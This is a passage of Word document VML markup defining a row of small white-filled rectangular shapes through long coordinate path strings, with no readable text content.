,2986,1300,2985,1300,2983,1300,2981,1300,2979,1300,2977,1300,2975,1300,2972,1300,2970,1300,2968,1300,2965,1300,2963,1300,2960,1300,2958,1300,2955,1300,2953,1300,2950,1300,2947,1300,2944,1300,2941,1300,2938,1300,2935,1300,2932,1300,2928,1300,2925,1300,2922,1300,2918,1300,2915,1300,2911,1300,2907,1300,2903,1300,2899,1300,2895,1300,2891,1300,2887,1300,2883,1300,2879,1300,2874,1300,2870,1300,2865,1300,2861,1300,2856,1300,2851,1300,2846,1300,2841,1300,2836,1300,2831,1300,2825,1300,2820,1300,2814,1300,2809,1300,2803,1300,2797,1300,2791,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1300,2785,1299,2785,1299,2785,1299,2785,1299,2785,1299,2785,1299,2785,1299,2785,1299,2785,1299,2785,1298,2785,1298,2785,1298,2785,1298,2785,1298,2785,1297,2785,1297,2785,1297,2785,1296,2785,1296,2785,1296,2785,1295,2785,1295,2785,1294,2785,1294,2785,1293,2785,1293,2785,1292,2785,1291,2785,1291,2785,1290,2785,1289,2785,1288,2785,1288,2785,1287,2785,1286,2785,1285,2785,1284,2785,1283,2785,1282,2785,1281,2785,1280,2785,1278,2785,1277,2785,1276,2785,1274,2785,1273,2785,1272,2785,1270,2785,1269,2785,1267,2785,1265,2785,1264,2785,1262,2785,1260,2785,1258,2785,1256,2785,1254,2785,1252,2785,1250,2785,1248,2785,1245,2785,1243,2785,1241,2785,1238,2785,1236,2785,1233,2785,1231,2785,1228,2785,1225,2785,1222,2785,1219,2785,1216,2785,1213,2785,1210,2785,1207,2785,1203,2785,1200,2785,1196,2785,1193,2785,1189,2785,1186,2785,1182,2785,1178,2785,1174,2785,1170,2785,1166,2785,1161,2785,1157,2785,1153,2785,1148,2785,1144,2785,1139,2785,1134,2785,1129,2785,1124,2785,1119,2785,1114,2785,1109,2785,1104,2785,1098,2785,1093,2785,1087,2785,1081,2785,1075,2785,1069,2785,1063,2785,1057,2785,1051,2785,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:51.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,1030" coordsize="250,270">
        <v:shape style="position:absolute;left:3010;top:1030;width:250;height:270" coordorigin="3010,1030" coordsize="250,270" path="m3026,1045l3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3026,1045,3027,1045,3027,1045,3027,1045,3027,1045,3027,1045,3027,1045,3028,1045,3028,1045,3028,1045,3029,1045,3029,1045,3029,1045,3030,1045,3030,1045,3031,1045,3031,1045,3032,1045,3032,1045,3033,1045,3033,1045,3034,1045,3035,1045,3035,1045,3036,1045,3037,1045,3038,1045,3039,1045,3039,1045,3040,1045,3041,1045,3042,1045,3043,1045,3044,1045,3046,1045,3047,1045,3048,1045,3049,1045,3051,1045,3052,1045,3053,1045,3055,1045,3056,1045,3058,1045,3059,1045,3061,1045,3063,1045,3065,1045,3066,1045,3068,1045,3070,1045,3072,1045,3074,1045,3077,1045,3079,1045,3081,1045,3083,1045,3086,1045,3088,1045,3091,1045,3093,1045,3096,1045,3098,1045,3101,1045,3104,1045,3107,1045,3110,1045,3113,1045,3116,1045,3119,1045,3123,1045,3126,1045,3129,1045,3133,1045,3136,1045,3140,1045,3144,1045,3148,1045,3152,1045,3156,1045,3160,1045,3164,1045,3168,1045,3172,1045,3177,1045,3181,1045,3186,1045,3190,1045,3195,1045,3200,1045,3205,1045,3210,1045,3215,1045,3220,1045,3226,1045,3231,1045,3237,1045,3242,1045,3248,1045,3254,1045,3260,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1046,3266,1046,3266,1046,3266,1046,3266,1046,3266,1047,3266,1047,3266,1047,3266,1048,3266,1048,3266,1048,3266,1049,3266,1049,3266,1049,3266,1050,3266,1050,3266,1051,3266,1052,3266,1052,3266,1053,3266,1054,3266,1054,3266,1055,3266,1056,3266,1057,3266,1057,3266,1058,3266,1059,3266,1060,3266,1061,3266,1062,3266,1063,3266,1065,3266,1066,3266,1067,3266,1068,3266,1070,3266,1071,3266,1073,3266,1074,3266,1076,3266,1077,3266,1079,3266,1081,3266,1082,3266,1084,3266,1086,3266,1088,3266,1090,3266,1092,3266,1094,3266,1096,3266,1099,3266,1101,3266,1103,3266,1106,3266,1108,3266,1111,3266,1114,3266,1116,3266,1119,3266,1122,3266,1125,3266,1128,3266,1131,3266,1134,3266,1138,3266,1141,3266,1144,3266,1148,3266,1151,3266,1155,3266,1159,3266,1162,3266,1166,3266,1170,3266,1174,3266,1178,3266,1183,3266,1187,3266,1191,3266,1196,3266,1201,3266,1205,3266,1210,3266,1215,3266,1220,3266,1225,3266,1230,3266,1235,3266,1241,3266,1246,3266,1252,3266,1257,3266,1263,3266,1269,3266,1275,3266,1281,3266,1287,3266,1293,3266,1300,3266,1300,3266,1300,3266,1300,3266,1300,3266,1300,3266,1300,3266,1300,3266,1300,3266,1300,3266,1300,3266,1300,3265,1300,3265,1300,3265,1300,3265,1300,3265,1300,3265,1300,3265,1300,3265,1300,3265,1300,3265,1300,3264,1300,3264,1300,3264,1300,3264,1300,3263,1300,3263,1300,3263,1300,3263,1300,3262,1300,3262,1300,3261,1300,3261,1300,3261,1300,3260,1300,3260,1300,3259,1300,3258,1300,3258,1300,3257,1300,3257,1300,3256,1300,3255,1300,3254,1300,3254,1300,3253,1300,3252,1300,3251,1300,3250,1300,3249,1300,3248,1300,3247,1300,3246,1300,3244,1300,3243,1300,3242,1300,3241,1300,3239,1300,3238,1300,3236,1300,3235,1300,3233,1300,3232,1300,3230,1300,3228,1300,3227,1300,3225,1300,3223,1300,3221,1300,3219,1300,3217,1300,3215,1300,3212,1300,3210,1300,3208,1300,3206,1300,3203,1300,3201,1300,3198,1300,3195,1300,3193,1300,3190,1300,3187,1300,3184,1300,3181,1300,3178,1300,3175,1300,3172,1300,3169,1300,3165,1300,3162,1300,3158,1300,3155,1300,3151,1300,3147,1300,3143,1300,3140,1300,3136,1300,3132,1300,3127,1300,3123,1300,3119,1300,3114,1300,3110,1300,3105,1300,3101,1300,3096,1300,3091,1300,3086,1300,3081,1300,3076,1300,3071,1300,3065,1300,3060,1300,3055,1300,3049,1300,3043,1300,3037,1300,3032,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1300,3026,1299,3026,1299,3026,1299,3026,1299,3026,1299,3026,1299,3026,1299,3026,1299,3026,1299,3026,1298,3026,1298,3026,1298,3026,1298,3026,1298,3026,1297,3026,1297,3026,1297,3026,1296,3026,1296,3026,1296,3026,1295,3026,1295,3026,1294,3026,1294,3026,1293,3026,1293,3026,1292,3026,1291,3026,1291,3026,1290,3026,1289,3026,1288,3026,1288,3026,1287,3026,1286,3026,1285,3026,1284,3026,1283,3026,1282,3026,1281,3026,1280,3026,1278,3026,1277,3026,1276,3026,1274,3026,1273,3026,1272,3026,1270,3026,1269,3026,1267,3026,1265,3026,1264,3026,1262,3026,1260,3026,1258,3026,1256,3026,1254,3026,1252,3026,1250,3026,1248,3026,1245,3026,1243,3026,1241,3026,1238,3026,1236,3026,1233,3026,1231,3026,1228,3026,1225,3026,1222,3026,1219,3026,1216,3026,1213,3026,1210,3026,1207,3026,1203,3026,1200,3026,1196,3026,1193,3026,1189,3026,1186,3026,1182,3026,1178,3026,1174,3026,1170,3026,1166,3026,1161,3026,1157,3026,1153,3026,1148,3026,1144,3026,1139,3026,1134,3026,1129,3026,1124,3026,1119,3026,1114,3026,1109,3026,1104,3026,1098,3026,1093,3026,1087,3026,1081,3026,1075,3026,1069,3026,1063,3026,1057,3026,1051,3026,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:162.500pt;margin-top:51.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3250,1030" coordsize="250,270">
        <v:shape style="position:absolute;left:3250;top:1030;width:250;height:270" coordorigin="3250,1030" coordsize="250,270" path="m3266,1045l3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3266,1045,3267,1045,3267,1045,3267,1045,3267,1045,3267,1045,3268,1045,3268,1045,3268,1045,3268,1045,3269,1045,3269,1045,3269,1045,3270,1045,3270,1045,3271,1045,3271,1045,3272,1045,3272,1045,3273,1045,3273,1045,3274,1045,3275,1045,3275,1045,3276,1045,3277,1045,3278,1045,3279,1045,3280,1045,3280,1045,3281,1045,3282,1045,3283,1045,3285,1045,3286,1045,3287,1045,3288,1045,3289,1045,3291,1045,3292,1045,3293,1045,3295,1045,3296,1045,3298,1045,3300,1045,3301,1045,3303,1045,3305,1045,3307,1045,3309,1045,3310,1045,3312,1045,3315,1045,3317,1045,3319,1045,3321,1045,3323,1045,3326,1045,3328,1045,3331,1045,3333,1045,3336,1045,3339,1045,3341,1045,3344,1045,3347,1045,3350,1045,3353,1045,3356,1045,3359,1045,3363,1045,3366,1045,3370,1045,3373,1045,3377,1045,3380,1045,3384,1045,3388,1045,3392,1045,3396,1045,3400,1045,3404,1045,3408,1045,3412,1045,3417,1045,3421,1045,3426,1045,3431,1045,3435,1045,3440,1045,3445,1045,3450,1045,3455,1045,3461,1045,3466,1045,3471,1045,3477,1045,3482,1045,3488,1045,3494,1045,3500,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1046,3506,1046,3506,1046,3506,1046,3506,1046,3506,1047,3506,1047,3506,1047,3506,1048,3506,1048,3506,1048,3506,1049,3506,1049,3506,1049,3506,1050,3506,1050,3506,1051,3506,1052,3506,1052,3506,1053,3506,1054,3506,1054,3506,1055,3506,1056,3506,1057,3506,1057,3506,1058,3506,1059,3506,1060,3506,1061,3506,1062,3506,1063,3506,1065,3506,1066,3506,1067,3506,1068,3506,1070,3506,1071,3506,1073,3506,1074,3506,1076,3506,1077,3506,1079,3506,1081,3506,1082,3506,1084,3506,1086,3506,1088,3506,1090,3506,1092,3506,1094,3506,1096,3506,1099,3506,1101,3506,1103,3506,1106,3506,1108,3506,1111,3506,1114,3506,1116,3506,1119,3506,1122,3506,1125,3506,1128,3506,1131,3506,1134,3506,1138,3506,1141,3506,1144,3506,1148,3506,1151,3506,1155,3506,1159,3506,1162,3506,1166,3506,1170,3506,1174,3506,1178,3506,1183,3506,1187,3506,1191,3506,1196,3506,1201,3506,1205,3506,1210,3506,1215,3506,1220,3506,1225,3506,1230,3506,1235,3506,1241,3506,1246,3506,1252,3506,1257,3506,1263,3506,1269,3506,1275,3506,1281,3506,1287,3506,1293,3506,1300,3506,1300,3506,1300,3506,1300,3506,1300,3506,1300,3506,1300,3506,1300,3506,1300,3506,1300,3506,1300,3506,1300,3506,1300,3506,1300,3505,1300,3505,1300,3505,1300,3505,1300,3505,1300,3505,1300,3505,1300,3505,1300,3504,1300,3504,1300,3504,1300,3504,1300,3504,1300,3503,1300,3503,1300,3503,1300,3502,1300,3502,1300,3502,1300,3501,1300,3501,1300,3500,1300,3500,1300,3499,1300,3499,1300,3498,1300,3497,1300,3497,1300,3496,1300,3495,1300,3494,1300,3494,1300,3493,1300,3492,1300,3491,1300,3490,1300,3489,1300,3488,1300,3487,1300,3486,1300,3485,1300,3483,1300,3482,1300,3481,1300,3479,1300,3478,1300,3477,1300,3475,1300,3473,1300,3472,1300,3470,1300,3468,1300,3467,1300,3465,1300,3463,1300,3461,1300,3459,1300,3457,1300,3455,1300,3453,1300,3450,1300,3448,1300,3446,1300,3443,1300,3441,1300,3438,1300,3436,1300,3433,1300,3430,1300,3427,1300,3424,1300,3421,1300,3418,1300,3415,1300,3412,1300,3409,1300,3405,1300,3402,1300,3398,1300,3395,1300,3391,1300,3387,1300,3384,1300,3380,1300,3376,1300,3372,1300,3368,1300,3363,1300,3359,1300,3355,1300,3350,1300,3345,1300,3341,1300,3336,1300,3331,1300,3326,1300,3321,1300,3316,1300,3311,1300,3306,1300,3300,1300,3295,1300,3289,1300,3283,1300,3278,1300,3272,1300,3266,1300,3266,1300,3266,1300,3266,1300,3266,1300,3266,1300,3266,1300,3266,1300,3266,1300,3266,1300,3266,1300,3266,1300,3266,1299,3266,1299,3266,1299,3266,1299,3266,1299,3266,1299,3266,1299,3266,1299,3266,1299,3266,1298,3266,1298,3266,1298,3266,1298,3266,1298,3266,1297,3266,1297,3266,1297,3266,1296,3266,1296,3266,1296,3266,1295,3266,1295,3266,1294,3266,1294,3266,1293,3266,1293,3266,1292,3266,1291,3266,1291,3266,1290,3266,1289,3266,1288,3266,1288,3266,1287,3266,1286,3266,1285,3266,1284,3266,1283,3266,1282,3266,1281,3266,1280,3266,1278,3266,1277,3266,1276,3266,1274,3266,1273,3266,1272,3266,1270,3266,1269,3266,1267,3266,1265,3266,1264,3266,1262,3266,1260,3266,1258,3266,1256,3266,1254,3266,1252,3266,1250,3266,1248,3266,1245,3266,1243,3266,1241,3266,1238,3266,1236,3266,1233,3266,1231,3266,1228,3266,1225,3266,1222,3266,1219,3266,1216,3266,1213,3266,1210,3266,1207,3266,1203,3266,1200,3266,1196,3266,1193,3266,1189,3266,1186,3266,1182,3266,1178,3266,1174,3266,1170,3266,1166,3266,1161,3266,1157,3266,1153,3266,1148,3266,1144,3266,1139,3266,1134,3266,1129,3266,1124,3266,1119,3266,1114,3266,1109,3266,1104,3266,1098,3266,1093,3266,1087,3266,1081,3266,1075,3266,1069,3266,1063,3266,1057,3266,1051,3266,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:174.500pt;margin-top:51.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3490,1030" coordsize="250,270">
        <v:shape style="position:absolute;left:3490;top:1030;width:250;height:270" coordorigin="3490,1030" coordsize="250,270" path="m3506,1045l3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3506,1045,3507,1045,3507,1045,3507,1045,3507,1045,3507,1045,3507,1045,3508,1045,3508,1045,3508,1045,3509,1045,3509,1045,3509,1045,3510,1045,3510,1045,3510,1045,3511,1045,3511,1045,3512,1045,3512,1045,3513,1045,3514,1045,3514,1045,3515,1045,3516,1045,3516,1045,3517,1045,3518,1045,3519,1045,3520,1045,3521,1045,3522,1045,3523,1045,3524,1045,3525,1045,3526,1045,3527,1045,3528,1045,3529,1045,3531,1045,3532,1045,3534,1045,3535,1045,3537,1045,3538,1045,3540,1045,3541,1045,3543,1045,3545,1045,3547,1045,3549,1045,3551,1045,3553,1045,3555,1045,3557,1045,3559,1045,3561,1045,3564,1045,3566,1045,3568,1045,3571,1045,3573,1045,3576,1045,3579,1045,3581,1045,3584,1045,3587,1045,3590,1045,3593,1045,3596,1045,3600,1045,3603,1045,3606,1045,3610,1045,3613,1045,3617,1045,3620,1045,3624,1045,3628,1045,3632,1045,3636,1045,3640,1045,3644,1045,3648,1045,3653,1045,3657,1045,3661,1045,3666,1045,3671,1045,3675,1045,3680,1045,3685,1045,3690,1045,3695,1045,3701,1045,3706,1045,3711,1045,3717,1045,3722,1045,3728,1045,3734,1045,3740,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1046,3746,1046,3746,1046,3746,1046,3746,1046,3746,1047,3746,1047,3746,1047,3746,1048,3746,1048,3746,1048,3746,1049,3746,1049,3746,1049,3746,1050,3746,1050,3746,1051,3746,1052,3746,1052,3746,1053,3746,1054,3746,1054,3746,1055,3746,1056,3746,1057,3746,1057,3746,1058,3746,1059,3746,1060,3746,1061,3746,1062,3746,1063,3746,1065,3746,1066,3746,1067,3746,1068,3746,1070,3746,1071,3746,1073,3746,1074,3746,1076,3746,1077,3746,1079,3746,1081,3746,1082,3746,1084,3746,1086,3746,1088,3746,1090,3746,1092,3746,1094,3746,1096,3746,1099,3746,1101,3746,1103,3746,1106,3746,1108,3746,1111,3746,1114,3746,1116,3746,1119,3746,1122,3746,1125,3746,1128,3746,1131,3746,1134,3746,1138,3746,1141,3746,1144,3746,1148,3746,1151,3746,1155,3746,1159,3746,1162,3746,1166,3746,1170,3746,1174,3746,1178,3746,1183,3746,1187,3746,1191,3746,1196,3746,1201,3746,1205,3746,1210,3746,1215,3746,1220,3746,1225,3746,1230,3746,1235,3746,1241,3746,1246,3746,1252,3746,1257,3746,1263,3746,1269,3746,1275,3746,1281,3746,1287,3746,1293,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3745,1300,3745,1300,3745,1300,3745,1300,3745,1300,3745,1300,3745,1300,3745,1300,3744,1300,3744,1300,3744,1300,3744,1300,3743,1300,3743,1300,3743,1300,3742,1300,3742,1300,3742,1300,3741,1300,3741,1300,3740,1300,3740,1300,3739,1300,3739,1300,3738,1300,3737,1300,3737,1300,3736,1300,3735,1300,3735,1300,3734,1300,3733,1300,3732,1300,3731,1300,3730,1300,3729,1300,3728,1300,3727,1300,3726,1300,3725,1300,3723,1300,3722,1300,3721,1300,3719,1300,3718,1300,3717,1300,3715,1300,3714,1300,3712,1300,3710,1300,3709,1300,3707,1300,3705,1300,3703,1300,3701,1300,3699,1300,3697,1300,3695,1300,3693,1300,3690,1300,3688,1300,3686,1300,3683,1300,3681,1300,3678,1300,3676,1300,3673,1300,3670,1300,3667,1300,3664,1300,3661,1300,3658,1300,3655,1300,3652,1300,3649,1300,3645,1300,3642,1300,3639,1300,3635,1300,3631,1300,3628,1300,3624,1300,3620,1300,3616,1300,3612,1300,3608,1300,3603,1300,3599,1300,3595,1300,3590,1300,3586,1300,3581,1300,3576,1300,3571,1300,3566,1300,3561,1300,3556,1300,3551,1300,3546,1300,3540,1300,3535,1300,3529,1300,3523,1300,3518,1300,3512,1300,3506,1300,3506,1300,3506,1300,3506,1300,3506,1300,3506,1300,3506,1300,3506,1300,3506,1300,3506,1300,3506,1300,3506,1300,3506,1299,3506,1299,3506,1299,3506,1299,3506,1299,3506,1299,3506,1299,3506,1299,3506,1299,3506,1298,3506,1298,3506,1298,3506,1298,3506,1298,3506,1297,3506,1297,3506,1297,3506,1296,3506,1296,3506,1296,3506,1295,3506,1295,3506,1294,3506,1294,3506,1293,3506,1293,3506,1292,3506,1291,3506,1291,3506,1290,3506,1289,3506,1288,3506,1288,3506,1287,3506,1286,3506,1285,3506,1284,3506,1283,3506,1282,3506,1281,3506,1280,3506,1278,3506,1277,3506,1276,3506,1274,3506,1273,3506,1272,3506,1270,3506,1269,3506,1267,3506,1265,3506,1264,3506,1262,3506,1260,3506,1258,3506,1256,3506,1254,3506,1252,3506,1250,3506,1248,3506,1245,3506,1243,3506,1241,3506,1238,3506,1236,3506,1233,3506,1231,3506,1228,3506,1225,3506,1222,3506,1219,3506,1216,3506,1213,3506,1210,3506,1207,3506,1203,3506,1200,3506,1196,3506,1193,3506,1189,3506,1186,3506,1182,3506,1178,3506,1174,3506,1170,3506,1166,3506,1161,3506,1157,3506,1153,3506,1148,3506,1144,3506,1139,3506,1134,3506,1129,3506,1124,3506,1119,3506,1114,3506,1109,3506,1104,3506,1098,3506,1093,3506,1087,3506,1081,3506,1075,3506,1069,3506,1063,3506,1057,3506,1051,3506,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:186.500pt;margin-top:51.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3730,1030" coordsize="250,270">
        <v:shape style="position:absolute;left:3730;top:1030;width:250;height:270" coordorigin="3730,1030" coordsize="250,270" path="m3746,1045l3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3746,1045,3747,1045,3747,1045,3747,1045,3747,1045,3747,1045,3747,1045,3748,1045,3748,1045,3748,1045,3748,1045,3749,1045,3749,1045,3749,1045,3750,1045,3750,1045,3751,1045,3751,1045,3751,1045,3752,1045,3753,1045,3753,1045,3754,1045,3754,1045,3755,1045,3756,1045,3756,1045,3757,1045,3758,1045,3759,1045,3760,1045,3761,1045,3762,1045,3763,1045,3764,1045,3765,1045,3766,1045,3767,1045,3768,1045,3770,1045,3771,1045,3772,1045,3774,1045,3775,1045,3777,1045,3778,1045,3780,1045,3782,1045,3783,1045,3785,1045,3787,1045,3789,1045,3791,1045,3793,1045,3795,1045,3797,1045,3799,1045,3801,1045,3804,1045,3806,1045,3808,1045,3811,1045,3814,1045,3816,1045,3819,1045,3822,1045,3824,1045,3827,1045,3830,1045,3833,1045,3837,1045,3840,1045,3843,1045,3846,1045,3850,1045,3853,1045,3857,1045,3861,1045,3864,1045,3868,1045,3872,1045,3876,1045,3880,1045,3884,1045,3888,1045,3893,1045,3897,1045,3902,1045,3906,1045,3911,1045,3916,1045,3920,1045,3925,1045,3930,1045,3936,1045,3941,1045,3946,1045,3951,1045,3957,1045,3963,1045,3968,1045,3974,1045,3980,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1046,3986,1046,3986,1046,3986,1046,3986,1046,3986,1047,3986,1047,3986,1047,3986,1048,3986,1048,3986,1048,3986,1049,3986,1049,3986,1049,3986,1050,3986,1050,3986,1051,3986,1052,3986,1052,3986,1053,3986,1054,3986,1054,3986,1055,3986,1056,3986,1057,3986,1057,3986,1058,3986,1059,3986,1060,3986,1061,3986,1062,3986,1063,3986,1065,3986,1066,3986,1067,3986,1068,3986,1070,3986,1071,3986,1073,3986,1074,3986,1076,3986,1077,3986,1079,3986,1081,3986,1082,3986,1084,3986,1086,3986,1088,3986,1090,3986,1092,3986,1094,3986,1096,3986,1099,3986,1101,3986,1103,3986,1106,3986,1108,3986,1111,3986,1114,3986,1116,3986,1119,3986,1122,3986,1125,3986,1128,3986,1131,3986,1134,3986,1138,3986,1141,3986,1144,3986,1148,3986,1151,3986,1155,3986,1159,3986,1162,3986,1166,3986,1170,3986,1174,3986,1178,3986,1183,3986,1187,3986,1191,3986,1196,3986,1201,3986,1205,3986,1210,3986,1215,3986,1220,3986,1225,3986,1230,3986,1235,3986,1241,3986,1246,3986,1252,3986,1257,3986,1263,3986,1269,3986,1275,3986,1281,3986,1287,3986,1293,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3986,1300,3985,1300,3985,1300,3985,1300,3985,1300,3985,1300,3985,1300,3984,1300,3984,1300,3984,1300,3984,1300,3984,1300,3983,1300,3983,1300,3983,1300,3982,1300,3982,1300,3981,1300,3981,1300,3980,1300,3980,1300,3979,1300,3979,1300,3978,1300,3978,1300,3977,1300,3976,1300,3975,1300,3975,1300,3974,1300,3973,1300,3972,1300,3971,1300,3970,1300,3969,1300,3968,1300,3967,1300,3966,1300,3965,1300,3964,1300,3962,1300,3961,1300,3960,1300,3958,1300,3957,1300,3955,1300,3954,1300,3952,1300,3950,1300,3949,1300,3947,1300,3945,1300,3943,1300,3941,1300,3939,1300,3937,1300,3935,1300,3933,1300,3931,1300,3928,1300,3926,1300,3923,1300,3921,1300,3918,1300,3916,1300,3913,1300,3910,1300,3907,1300,3905,1300,3902,1300,3898,1300,3895,1300,3892,1300,3889,1300,3886,1300,3882,1300,3879,1300,3875,1300,3871,1300,3868,1300,3864,1300,3860,1300,3856,1300,3852,1300,3848,1300,3844,1300,3839,1300,3835,1300,3830,1300,3826,1300,3821,1300,3816,1300,3811,1300,3807,1300,3801,1300,3796,1300,3791,1300,3786,1300,3780,1300,3775,1300,3769,1300,3764,1300,3758,1300,3752,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1300,3746,1299,3746,1299,3746,1299,3746,1299,3746,1299,3746,1299,3746,1299,3746,1299,3746,1299,3746,1298,3746,1298,3746,1298,3746,1298,3746,1298,3746,1297,3746,1297,3746,1297,3746,1296,3746,1296,3746,1296,3746,1295,3746,1295,3746,1294,3746,1294,3746,1293,3746,1293,3746,1292,3746,1291,3746,1291,3746,1290,3746,1289,3746,1288,3746,1288,3746,1287,3746,1286,3746,1285,3746,1284,3746,1283,3746,1282,3746,1281,3746,1280,3746,1278,3746,1277,3746,1276,3746,1274,3746,1273,3746,1272,3746,1270,3746,1269,3746,1267,3746,1265,3746,1264,3746,1262,3746,1260,3746,1258,3746,1256,3746,1254,3746,1252,3746,1250,3746,1248,3746,1245,3746,1243,3746,1241,3746,1238,3746,1236,3746,1233,3746,1231,3746,1228,3746,1225,3746,1222,3746,1219,3746,1216,3746,1213,3746,1210,3746,1207,3746,1203,3746,1200,3746,1196,3746,1193,3746,1189,3746,1186,3746,1182,3746,1178,3746,1174,3746,1170,3746,1166,3746,1161,3746,1157,3746,1153,3746,1148,3746,1144,3746,1139,3746,1134,3746,1129,3746,1124,3746,1119,3746,1114,3746,1109,3746,1104,3746,1098,3746,1093,3746,1087,3746,1081,3746,1075,3746,1069,3746,1063,3746,1057,3746,1051,3746,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:198.500pt;margin-top:51.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3970,1030" coordsize="250,270">
        <v:shape style="position:absolute;left:3970;top:1030;width:250;height:270" coordorigin="3970,1030" coordsize="250,270" path="m3986,1045l3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3986,1045,3987,1045,3987,1045,3987,1045,3987,1045,3987,1045,3987,1045,3988,1045,3988,1045,3988,1045,3988,1045,3989,1045,3989,1045,3989,1045,3989,1045,3990,1045,3990,1045,3991,1045,3991,1045,3992,1045,3992,1045,3993,1045,3993,1045,3994,1045,3994,1045,3995,1045,3996,1045,3997,1045,3997,1045,3998,1045,3999,1045,4000,1045,4001,1045,4002,1045,4003,1045,4004,1045,4005,1045,4006,1045,4007,1045,4008,1045,4010,1045,4011,1045,4012,1045,4014,1045,4015,1045,4017,1045,4018,1045,4020,1045,4022,1045,4023,1045,4025,1045,4027,1045,4029,1045,4031,1045,4033,1045,4035,1045,4037,1045,4039,1045,4041,1045,4044,1045,4046,1045,4049,1045,4051,1045,4054,1045,4056,1045,4059,1045,4062,1045,4065,1045,4067,1045,4070,1045,4074,1045,4077,1045,4080,1045,4083,1045,4086,1045,4090,1045,4093,1045,4097,1045,4101,1045,4104,1045,4108,1045,4112,1045,4116,1045,4120,1045,4124,1045,4128,1045,4133,1045,4137,1045,4142,1045,4146,1045,4151,1045,4156,1045,4161,1045,4166,1045,4171,1045,4176,1045,4181,1045,4186,1045,4192,1045,4197,1045,4203,1045,4208,1045,4214,1045,4220,1045,4226,1045,4226,1045,4226,1045,4226,1045,4226,1045,4226,1045,4226,1045,4226,1045,4226,1045,4226,1045,4226,1045,4226,1045,4226,1045,4226,1045,4226,1045,4226,1045,4226,1045,4226,1045,4226,1045,4226,1045,4226,1046,4226,1046,4226,1046,4226,1046,4226,1046,4226,1047,4226,1047,4226,1047,4226,1048,4226,1048,4226,1048,4226,1049,4226,1049,4226,1049,4226,1050,4226,1050,4226,1051,4226,1052,4226,1052,4226,1053,4226,1054,4226,1054,4226,1055,4226,1056,4226,1057,4226,1057,4226,1058,4226,1059,4226,1060,4226,1061,4226,1062,4226,1063,4226,1065,4226,1066,4226,1067,4226,1068,4226,1070,4226,1071,4226,1073,4226,1074,4226,1076,4226,1077,4226,1079,4226,1081,4226,1082,4226,1084,4226,1086,4226,1088,4226,1090,4226,1092,4226,1094,4226,1096,4226,1099,4226,1101,4226,1103,4226,1106,4226,1108,4226,1111,4226,1114,4226,1116,4226,1119,4226,1122,4226,1125,4226,1128,4226,1131,4226,1134,4226,1138,4226,